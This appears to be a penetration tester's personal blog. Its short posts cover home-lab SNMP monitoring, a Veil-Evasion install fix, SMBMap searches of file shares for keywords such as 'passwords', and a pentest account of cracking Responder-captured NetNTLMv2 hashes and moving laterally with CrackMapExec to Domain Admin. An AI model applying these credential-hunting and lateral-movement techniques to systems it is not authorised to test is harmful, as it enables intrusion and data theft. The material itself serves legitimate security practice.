https://news.slashdot.org/story/17/11/20/1713235/another-tor-browser-feature-makes-it-into-firefox-first-party-isolation

Another item to add to the list

Cool tool for SMB searching

SMBMap - on my last engagement this would have come in handy. Look you can even search by regex patterns across a list of IPs or file shares. Now script it for keywords like "legal", "accounting", "sales", "passwords","termination","future", etc.

SNMP with Synology NAS

In a post from November I'd mentioned trying to get this to work and failing:

"Update (For the life of me, can't get this to work): http://blog.tafkas.net/2015"/01/15/monitoring-a-synology-diskstation-with-munin/
"

 Now I finally got it working. The key was to make sure that when the article says "Therefor create a file inside /etc/munin/plugin-conf.d/ folder with the name of the host (e.g. diskstation) containing two lines:" that I used the FQDN as returned from a ping. I finally got the pihole working with the Ubiquiti by setting the local LAN to use it directly and the router as secondary DNS, and added some entries to the pihole's /etc/hosts file to map to certain hosts with the domain (e.g. server.homenet). Then the file in /etc/munin/plugin-conf.d/ was named server.homenet and included the following two lines:

[snmp_server.HomeNet_*]
env.community secret_string

I also included the following in munin.conf:


[server.HomeNet]
    address 127.0.0.1
    use_node_name no

And made sure to restart munin-node and munin on the Munin server itself. 

Update: The same process can be followed for any device that supports SNMP, such as a router.

So much yet to learn

A recent pentest exposed to me in more full gory detail how much I still don't know about working in AD and various terminologies. For the first time in a while I was able to successfully capture and crack NetNTLMv2 hashes captured using Responder. However I was stymied by metasploit's psexec not working, until I stumbled across CrackMapExec and found that requests spawned with WMI work but psexec didn't. Then I slowly made my way to various systems and discovered that I don't know nearly enough what can actually be done with Domain Admin. I could even potentially use impersonization/delegation tokens for DAs but decided not to.

So now my priority goals going forward are two-fold:

1. Set up an Active Directory lab at home. There are plenty of guides available. Most likely it would be on my Thinkpad T460p, which was purchased almost specifically for this purpose. (Now if I can just get it to stop shutting off every time the battery wiggles inadvertently...) This gives it the element of portability.

2. Really practice with some VMs. Set up some sort of environment which requires heavy use of Metasploit and meterpreter to obtain elevated privileges/credentials/access/whatever. That way I won't flail around when encountering an AD environment.

Of course I'll also finish setting up the new EdgeRouter X courtesy of this guide: https://github.com/mjp66/Ubiquiti. I would never have managed the job without this document. The only things remaining are resolving some DNS issues, getting the Tor relay back up and running either on its own untrusted network or SSH-limited on the same home network, and changing the Edgerouter to use DNSMasq and getting the pihole to serve DNS requests instead.

 

Installing Veil Evasion in Kali Linux

This issue could be specific to this laptop model - which is an HP Elitebook 8460p, but if not I hope someone will find this information useful. If installing Veil from https://github.com/Veil-Framework/Veil-Evasion, you may encounter a problem after restarting the machine where X (window manager) just won't start. For reference, I use Gnome on Kali 2017.2. The problem is that the installation of Wine performed as part of the Veil install removes three critical packages:

libqt4-opengl-dev libglu1-mesa-dev libgl1-mesa-dev. An apt-get install of these should fix the issue. I would recommend adding these back after the Veil install has finished, or you'll need to boot into safe mode, bring up a network interface (for eth0 on a DHCP-enabled network you can plug in a network cable and start NetworkManager), and then install from there.